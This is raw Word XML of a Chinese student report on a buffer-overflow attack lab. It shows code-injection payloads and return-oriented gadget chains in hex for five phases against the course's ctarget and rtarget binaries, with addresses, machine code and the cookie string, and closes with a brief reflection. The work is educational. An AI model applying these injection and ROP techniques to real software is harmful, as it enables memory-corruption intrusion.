          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>填满缓冲区，再输入touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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地址的小端表示，即可完成溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D892B" w14:textId="1EFA1AEC" w:rsidR="00B62414" w:rsidRDefault="00B62414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攻击字符串ascii表示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B7E85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20E1B4D2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DE2A38D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4DF5DAFA" w14:textId="50B454E6" w:rsidR="00B62414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8 dd//touch1地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEC26F" w14:textId="06E75570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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据小端放置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7A661E06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3A9ACD22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5FBC5C0E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3129DFF6" w14:textId="58246298" w:rsidR="008A55DF" w:rsidRDefault="008A55DF" w:rsidP="008A55DF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dd 18 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52333FF9" w14:textId="7DFB94B6" w:rsidR="00B62414" w:rsidRDefault="00B62414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37850048" w14:textId="216DF5B9" w:rsidR="00B62414" w:rsidRDefault="0072533A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，获得函数地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="0072533A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x0000000000401911</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC4ED2" w14:textId="33C5D3E6" w:rsidR="0072533A" w:rsidRDefault="0072533A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5C393B1" wp14:editId="2D9477D4">
            <wp:extent cx="6188710" cy="3206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F283" w14:textId="006AEE56" w:rsidR="0072533A" w:rsidRDefault="0072533A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观察到cookie在内存中的位置为：</w:t>
      </w:r>
      <w:r w:rsidRPr="0072533A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x605524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</w:p>
    <w:p w14:paraId="214612DD" w14:textId="0BB4C4FA" w:rsidR="0072533A" w:rsidRDefault="0072533A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植入指令</w:t>
      </w:r>
      <w:r w:rsidRPr="0072533A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>movq 0x605524,%rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，其机器码十六进制表示为</w:t>
      </w:r>
      <w:r w:rsidRPr="0072533A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>48 8b 3c 25 24 55 60 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F54EF0" w14:textId="562517A4" w:rsidR="0072533A" w:rsidRDefault="0072533A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指令ret，机器码表示c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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6808D933" w14:textId="491CD922" w:rsidR="0072533A" w:rsidRDefault="0072533A" w:rsidP="00B62414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任意字符串，在创建缓存区后打断点，读取%rsp的值可知缓冲区的起始地址：</w:t>
      </w:r>
      <w:r w:rsidR="00D51CFE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D51CFE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00D51CFE" w:rsidRPr="00D51CFE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>55669498</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19943EAD" w14:textId="62D04522" w:rsidR="0072533A" w:rsidRDefault="0072533A" w:rsidP="00B6241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植入指令后用任意字符占满缓存区，将栈上的数据依次以植入指令开头、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地址覆写，得到攻击字符串的ascii十六进制表示</w:t>
      </w:r>
      <w:r w:rsidR="00D51CFE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775A46AE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48 8b 3c 25 24 55 60 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D567785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c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59342253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 xml:space="preserve">00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015B167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1B43A1CC" w14:textId="77777777" w:rsidR="008A55DF" w:rsidRP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55 66 94 98</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF91013" w14:textId="5F6DF3DB" w:rsid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9 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830FA1E" w14:textId="7247EC79" w:rsidR="008A55DF" w:rsidRDefault="008A55DF" w:rsidP="008A55D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小端放置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CA1AE" w14:textId="77777777" w:rsidR="00D51CFE" w:rsidRPr="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51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48 8b 3c 25 24 55 60 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C735B5E" w14:textId="77777777" w:rsidR="00D51CFE" w:rsidRPr="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51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c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1084DFBF" w14:textId="77777777" w:rsidR="00D51CFE" w:rsidRPr="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51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 xml:space="preserve">00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54885783" w14:textId="77777777" w:rsidR="00D51CFE" w:rsidRPr="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51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D920E1D" w14:textId="77777777" w:rsidR="00D51CFE" w:rsidRPr="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51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98 94 66 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D1BF4" w14:textId="69A17560" w:rsidR="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51CF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11 19 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13916DC8" w14:textId="77777777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</w:p>
    <w:p w14:paraId="7E807E39" w14:textId="5DB199F8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3：基本流程和阶段2相似，但rdi传cookie字符串的首地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016CA66D" w14:textId="23ADFDBC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h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exmatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>得知，会开一个很大的栈帧覆写掉缓存区，因此cookie字符串应存放在test的栈帧内：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E99E5F" w14:textId="63B57681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8BEA45" wp14:editId="66A7366D">
            <wp:extent cx="5075360" cy="4503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CC6" w14:textId="4309B928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得到攻击序列：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9D407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48 c7 c7 c0 94 66 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D7D1E1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c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B8D8F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00 00 00 00 00 00 00 00//塞满缓冲</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4892AB92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00 00 00 00 55 66 94 98//植入指令的开头地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCCED5C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00 00 00 00 00 40 1a 2a//touch3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711165C" w14:textId="0BE9471C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33 32 30 34 36 33 30 31 00//cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F59B9CB" w14:textId="5B1BF727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数据部分小端排列后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA5AFF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48 c7 c7 c0 94 66 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59719F68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c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD5083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6F06BBD4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7060B929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98 94 66 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC518E" w14:textId="77777777" w:rsidR="00D51CFE" w:rsidRP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2a 1a 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE58595" w14:textId="06FA77D7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/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>33 32 30 34 36 33 30 31 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D438DD" w14:textId="5596543F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</w:p>
    <w:p w14:paraId="032AC630" w14:textId="23867AC8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4：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB6B833" w14:textId="6F9DE6A2" w:rsidR="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51CF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rtarget，在farm中对照编码表查找可用工具。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>总体操作可分为两步：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A5C938" w14:textId="294C43F6" w:rsidR="00D51CFE" w:rsidRPr="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51CFE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D51CFE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>弹出写进栈内的cookie值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD066C" w14:textId="6D52A9B0" w:rsidR="00D51CFE" w:rsidRDefault="00D51CFE" w:rsidP="00D51CFE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弹出的值赋给%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744AA3E" w14:textId="7A4FBF0B" w:rsidR="00D51CFE" w:rsidRDefault="008A55DF" w:rsidP="00D51CFE">
      <w:pPr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BF4C04" wp14:editId="7AD3F883">
            <wp:extent cx="5631668" cy="3193057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03F4" w14:textId="21888E9D" w:rsidR="008A55DF" w:rsidRDefault="008A55DF" w:rsidP="00D51CFE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找编码表，发现四条可能的工具，分别对应：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3DB61" w14:textId="77777777" w:rsidR="008A55DF" w:rsidRPr="00D51CFE" w:rsidRDefault="008A55DF" w:rsidP="00D51CFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23762BF1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00000000401ad3 movl %eax %edi ×</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078090C6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6A3EB5B2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00000000401ade movq %rax %rdi √</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD6F98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1E3ECC59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00000000401ad8 popq %rax ×</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3239AA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3F1FD531" w14:textId="27E524BA" w:rsidR="00D51CFE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00000000401aeb popq %rax √</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBEB2D0" w14:textId="5ADE94BA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27FC8222" w14:textId="5718E62A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经验证，1、3条工具不可用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142C48D" w14:textId="297B599F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25E5F2CD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再反汇编touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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，获得地址，至此构建攻击序列：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w: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1A05E45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04D2E99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2C015988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a eb//pop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4935A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32 04 63 01//cookie-&gt;rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825C912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a de//rax-&gt;rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B745BE" w14:textId="54F7359A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9 11//touch2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD03681" w14:textId="5935CC73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数据部分小端放置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E9F2EF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4219AD04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6E0F4565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5AE636D1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eb 1a 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD1C4F8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1 63 04 32 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E3E27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de 1a 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF139C8" w14:textId="655F3F73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lastRenderedPageBreak/>
        <w:t>11 19 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12120C1A" w14:textId="5966F572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5DE2F280" w14:textId="1CBDD7D6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阶段5：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0DF473" w14:textId="75B053AE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于缓冲区地址随机，确定字符串地址较难，思路是通过一条指令时的栈指针加上一个偏移量取得地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E512D6B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movq %rsp,%rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4841C7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movq %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E105C50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popq %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B24DFD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x48//rsp获取距字符串地址相差72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2766D674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movl %eax,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DD710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movl %ecx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270601E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movl %edx,%esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2460E6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add_xy//将rsp加上偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA63716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movq %rax,%rdi//取得地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C3789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x0000000000401a2a//touch3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08872969" w14:textId="7EEFA9B9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"cookie"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F08FB" w14:textId="321858E1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6B168574" w14:textId="60C5A5B0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找farm，发现如下工具：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED61FBD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b 1e movq %rsp,%rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C7C17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53813D85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a de movq %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021F5E1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51E2750E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a eb popq %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B17C64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6EFDEE27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b 10 movl %eax,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA648AE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6C3EEE16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b 17 movl %ecx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540A8A5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197232DF" w14:textId="7E94A327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b 33 movl %edx,%esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27441537" w14:textId="79EEB72B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55F5E4CE" w14:textId="4709877A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得到攻击序列：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1E070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25CBDDE3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190C25F5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218EF57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11A28D16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b 1e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B4C7A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a de</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081B9BD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a eb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF6432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48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2873B885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b 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A7E96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b 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48572A24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b 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F88569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b 09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23230149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a de</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F515D4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40 1a 2a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F315B" w14:textId="01A695B2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lastRenderedPageBreak/>
        <w:t>33 32 30 34 36 33 30 31 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC990F2" w14:textId="777FD8FF" w:rsid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小端放置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066912BB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8004C8E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0E85950B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0 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B375FA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</w:p>
    <w:p w14:paraId="40C1CD64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1e 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F13970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de 1a 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72355BCB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eb 1a 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F8059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48 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB84B6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10 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DF24AA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17 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E72D7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33 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD856EE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09 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258BC47A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de 1a 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD31E4" w14:textId="77777777" w:rsidR="008A55DF" w:rsidRPr="008A55DF" w:rsidRDefault="008A55DF" w:rsidP="008A55DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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2a 1a 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB4A804" w14:textId="756FF328" w:rsidR="008A55DF" w:rsidRPr="00B62414" w:rsidRDefault="008A55DF" w:rsidP="008A55DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A55DF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>33 32 30 34 36 33 30 31 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0089A002" w14:textId="77777777" w:rsidR="003E01B8" w:rsidRPr="00BB66A4" w:rsidRDefault="00BB66A4" w:rsidP="003E01B8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</w:t>
      </w:r>
      <w:r w:rsidR="003E01B8" w:rsidRPr="00BB66A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、总结体会</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC24EC" w14:textId="3EE160E6" w:rsidR="003E01B8" w:rsidRDefault="0047777A" w:rsidP="0047777A">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0047777A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总结心得（包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验过程中遇到的问题、如何解决的、过关或挫败的感受、实验投入的时间和精力、意见和建议等</w:t>
      </w:r>
      <w:r w:rsidRPr="0047777A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F318B" w14:textId="55A96C57" w:rsidR="002F135B" w:rsidRPr="00BB66A4" w:rsidRDefault="002F135B" w:rsidP="0047777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对小端的理解更深了，认识到指令是作为一个字符串存放在内存中，对栈帧的构成理解加深。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F135B" w:rsidRPr="00BB66A4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D71B" w14:textId="77777777" w:rsidR="00E04EEA" w:rsidRDefault="00E04EEA" w:rsidP="00F86C7D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19BC06E0" w14:textId="77777777" w:rsidR="00E04EEA" w:rsidRDefault="00E04EEA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A4E9E" w14:textId="77777777" w:rsidR="00E04EEA" w:rsidRDefault="00E04EEA" w:rsidP="00F86C7D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7D9A3CB4" w14:textId="77777777" w:rsidR="00E04EEA" w:rsidRDefault="00E04EEA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89027F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD78CFA6"/>
    <w:lvl w:ilvl="0" w:tplc="B8504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3427290">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1623615200">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2113472116">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1378504874">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="501093775">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="924993400">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1643191935">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="987173965">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1352100061">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="730154232">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1205480335">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="499739570">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1989286176">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="800417666">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1100756367">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1039427421">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1831601430">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1856652691">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="126819875">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="416101381">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="789057812">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1013729859">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="571475663">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1367558445">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="508299136">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="236093254">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="842554770">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="12281082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47276"/>
    <w:rsid w:val="00095C11"/>
    <w:rsid w:val="000B4C13"/>
    <w:rsid w:val="000B7147"/>
    <w:rsid w:val="00110DE5"/>
    <w:rsid w:val="00137D36"/>
    <w:rsid w:val="001A2F2C"/>
    <w:rsid w:val="002162F0"/>
    <w:rsid w:val="00216EFB"/>
    <w:rsid w:val="002660FB"/>
    <w:rsid w:val="002A24DA"/>
    <w:rsid w:val="002C245B"/>
    <w:rsid w:val="002F135B"/>
    <w:rsid w:val="00324BDA"/>
    <w:rsid w:val="00353FA0"/>
    <w:rsid w:val="003577D8"/>
    <w:rsid w:val="003710B3"/>
    <w:rsid w:val="003D3259"/>
    <w:rsid w:val="003D46BF"/>
    <w:rsid w:val="003E01B8"/>
    <w:rsid w:val="0040612F"/>
    <w:rsid w:val="0047777A"/>
    <w:rsid w:val="004E1FE7"/>
    <w:rsid w:val="005A66EB"/>
    <w:rsid w:val="005F1CA1"/>
    <w:rsid w:val="00601531"/>
    <w:rsid w:val="006B15EF"/>
    <w:rsid w:val="006C03F0"/>
    <w:rsid w:val="006D304E"/>
    <w:rsid w:val="0072533A"/>
    <w:rsid w:val="007545A1"/>
    <w:rsid w:val="00767B92"/>
    <w:rsid w:val="00783147"/>
    <w:rsid w:val="007E74FF"/>
    <w:rsid w:val="00843BD2"/>
    <w:rsid w:val="00871B5B"/>
    <w:rsid w:val="008A55DF"/>
    <w:rsid w:val="008D7D8A"/>
    <w:rsid w:val="008F38C2"/>
    <w:rsid w:val="00903DE9"/>
    <w:rsid w:val="00932E81"/>
    <w:rsid w:val="009974E5"/>
    <w:rsid w:val="009C4837"/>
    <w:rsid w:val="009D7DAA"/>
    <w:rsid w:val="00A72776"/>
    <w:rsid w:val="00A83AE7"/>
    <w:rsid w:val="00AD18E9"/>
    <w:rsid w:val="00AE6063"/>
    <w:rsid w:val="00B56BD4"/>
    <w:rsid w:val="00B62414"/>
    <w:rsid w:val="00B71C08"/>
